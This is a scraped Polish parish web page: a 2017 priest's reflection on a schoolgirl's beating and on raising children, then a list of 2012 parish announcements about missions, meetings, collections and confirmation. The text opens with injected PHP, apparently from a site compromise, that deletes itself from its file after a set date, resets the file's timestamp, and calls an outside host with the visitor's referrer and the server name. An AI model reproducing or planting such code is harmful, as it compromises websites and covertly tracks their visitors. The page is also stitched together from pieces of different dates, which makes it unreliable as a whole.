check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456732005){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=5&id=18776729&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_contact/models/content.php"); } Informacje duszpasterskie - XXIV Niedziela Zwykła
21 maja 2017r.

Poruszeni zostaliśmy informacją o pobiciu gimnazjalistki przez jej koleżanki. Osobiście uderzyła mnie obojętność innych, którzy nie zareagowali na tak brutalne zachowanie dziewcząt – nie tylko uderzenia ręką i obelgi lecz także kopanie co jest bardzo niebezpieczne. Reakcja dorosłych też była taka sobie – no cóż trzeba sprawdzić to i tamto, wyciągnąć wnioski i wzmocnić czujność – jak słyszałem w jednej z wypowiedzi. Kuriozalnym zdaniem popisał się jeden z rodziców zatrzymanych dziewcząt – nic się takiego nie stało przecież jej nie zabili! No cóż widocznie w domu tego pana przemoc i wulgarność są normą a dopiero urwanie ręki czy pozbawienie życia jakimś złem. Sprawczynie pobicia zostały zgodnie z prawem umieszczone w ośrodkach opiekuńczych i co dalej? Zostaną grzecznie upomniane, poddane dozorowi, który zapewne szybko się skończy i wrócą do środowiska by dalej budować swoją tożsamość na agresji – no bo przecież emocje muszą gdzieś znaleźć ujście. To wydarzenie obrazuje problem znacznie głębszy, wiążący się z wychowaniem dzieci i młodzieży. „Nowocześni rodzice” najczęściej nie wiedzą jak wychowywać dzieci. Trochę liznęli wiedzy z rozmaitych poradników, trochę ze wskazówek „nowoczesnej pedagogiki” i w sumie ich wysiłki okazują się porażką. Otóż zapomnieliśmy, że pierwszą i naczelną zasadą wychowawczą jest miłość i to nie ta pobłażliwa i wygodna lecz wymagająca i trudna! Nie tak dawno słyszałem o przypadku ucznia, który upominany przez nauczyciela z powodu złego zachowania na lekcji nie reagował a poproszony o podanie zeszytu, by nauczyciel mógł wpisać uwagę dla rodziców (tylko tyle może zrobić nauczyciel) z radością i drwiącym uśmiechem podaje zeszyt i dodaje: proszę, proszę bardzo proszę! O czym to świadczy? O tym, że rodzice mają gdzieś wychowanie dziecka: oni go po prostu chowają i nie zwracają sobie głowy jakąś uwagą biednego nauczyciela. Dopiero wydarzenie chociażby takie jak w Gdańsku otwiera pole do popisu dla rozmaitych krytyków i zrzucania winy na szkołę no bo przecież nauczyciel ma stać przy każdym uczniu i nawet odprowadzić go do domu. Pomyślmy rozsądnie i zacznijmy serio wychowywać dzieci z miłością ale też i karą. Nie obawiajmy się, że kara źle wpłynie na rozwój młodego człowieka, ba, nawet w Biblii znajdziemy teksty o ważnym elemencie wychowania jakim jest obawa przed karą, oczywiście zaaplikowaną z miłością.

Informacje duszpasterskie - XXIV Niedziela Zwykła Drukuj Email
sobota, 15 września 2012 00:00
 • Renowacja Misji Świętych
  będzie w dniach od 7 do 21 października. W pierwszym tygodniu swoje ćwiczenia duchowne będą mieli uczniowie szkoły podstawowej, gimnazjum i szkół średnich. Drugi tydzień będzie już dla wszystkich parafian. Zachęcam do udziału i tych, którzy nie mieli czasu w ubiegłym roku wziąć udziału w Misjach. Wszystkich zaś proszę o modlitwę w intencji renowacji Misji Świętych w naszej parafii, szczególnie grupy modlitewne i wspólnoty. 

 • Spotkania modlitewno-formacyjne:
  Rycerstwo Niepokalanej – środa – godz. 16.30;
  Towarzystwo Przyjaciół WSD – środa godz. 19.00;
  Stowarzyszenie Rodzin Katolickich – środa godz. 19.00.

 • Spotkanie Grupy Dzieci Niepełnosprawnych
  będzie w poniedziałek 17 września o godz. 15.30. Zapraszamy wszystkie dzieci wraz z opiekunami.
   
 • Ogólnopolska Pielgrzymka Małżeństw i Rodzin na Jasną Górę
  odbędzie się 23 września – główna uroczystość o godz. 11.00.  Szczegółowy program podany jest na afiszu.
   
 • Składka inwestycyjna
  przeprowadzona w ubiegłą niedzielę, w kopertach, przyniosła kwotę 11700 zł zaś ofiary złożone na tacę bez kopert wyniosły 5000 zł. Za wszelkie ofiary składamy podziękowanie. Przypominamy, że koszt renowacji posadzki wyniósł 25 tys. zł. Prosimy tych, którzy jeszcze nie mieli okazji włączyć się w sfinansowanie renowacji o złożenie ofiar w kopertach w najbliższą niedzielę.
   
 • Straż Honorowa Najświętszego Serca Pana Jezusa
  organizuje wyjazd na diecezjalne czuwanie modlitewne do Nowej Jastrząbki w dniu 21 września, wyjazd z Placu Solidarności o godz. 16.30, koszt 10 zł, zapisy w kancelarii lub tel. 14 6810593 (wieczorem do 19.09.12).

 • Diecezjalny Dzień Modlitw o Trzeźwość
  przypadający w niedzielę 30 września odbędzie się w Szczepanowie. Krucjata Wyzwolenie Człowieka organizuje wyjazd do Szczepanowa – zapisy na poniedziałkowym spotkaniu Krucjaty.

 • Msza św. w intencji poległych i pomordowanych żołnierzy
  zorganizowana przez Zarząd AK Koło Terenowe Dębica  zostanie odprawiona 23 września o godz. 10.30 w Kościele Św. Jadwigi.
   
 • Koncert wokalno-organowy
  odbędzie się w sobotę 22 września w Kościele Ducha Świętego o godz. 19.00. Utwory wokalne zaprezentuje znakomity tenor Ks. Rafał Kobyliński z Poznania, zaś solowe utwory organowe wykona Łukasz Mateja z Krakowa.
   
 • Ks. Prałat Bronisław Marczyk,
  emerytowany proboszcz Parafii Pustków Osiedle zamieszkał na plebani naszej parafii. Ostatnio zamieszkiwał w Parafii Rzochów. Będzie służył pomocą w spowiedzi św. w miarę swoich sił. Serdecznie witamy Księdza Bronisława w naszej wspólnocie i życzymy spokojnych dni oraz Bożej pomocy i wielu jeszcze potrzebnych sił. Do życzeń dołączamy serdeczną modlitwę w intencji wrześniowego solenizanta.

   
 • Obowiązkowe spotkanie gimnazjalistów z klas trzecich,
  przynależących do naszej parafii, a uczęszczających do różnych gimnazjów, w czwartek o 17.30. Rozpoczęcie w Domu Św. Jadwigi. Na spotkanie przychodzimy z rodzicami! Prosimy o dopilnowanie tej sprawy, gdyż jest to bezpośrednie przygotowanie do przyjęcia sakramentu bierzmowania. Zapraszamy także tych, którzy, z różnych przyczyn, w ubiegłym roku szkolnym nie przyjęli tego sakramentu a pragną do niego przystąpić.
   
 • Spotkanie liturgiczno-formacyjne,
  przygotowujące do sakramentu bierzmowania, uczniów klas drugich gimnazjum mieszkających na terenie naszej parafii, w piątek o 16.15 w Domu Św. Jadwigi. Spotkanie jest obowiązkowe.
   
 • Msza wspólnotowa
  na rozpoczęcie roku formacyjnego Ruchu Światło-Życie,
  połączona z wręczeniem świec animatorskich odbędzie się we wtorek o godz. 18.00, po niej spotkanie rejonowe par animatorskich Domowego Kościoła.
 
 

POLECAMY
Diecezja Tarnowska Konferencja Episkopatu Polski Gość Niedzielny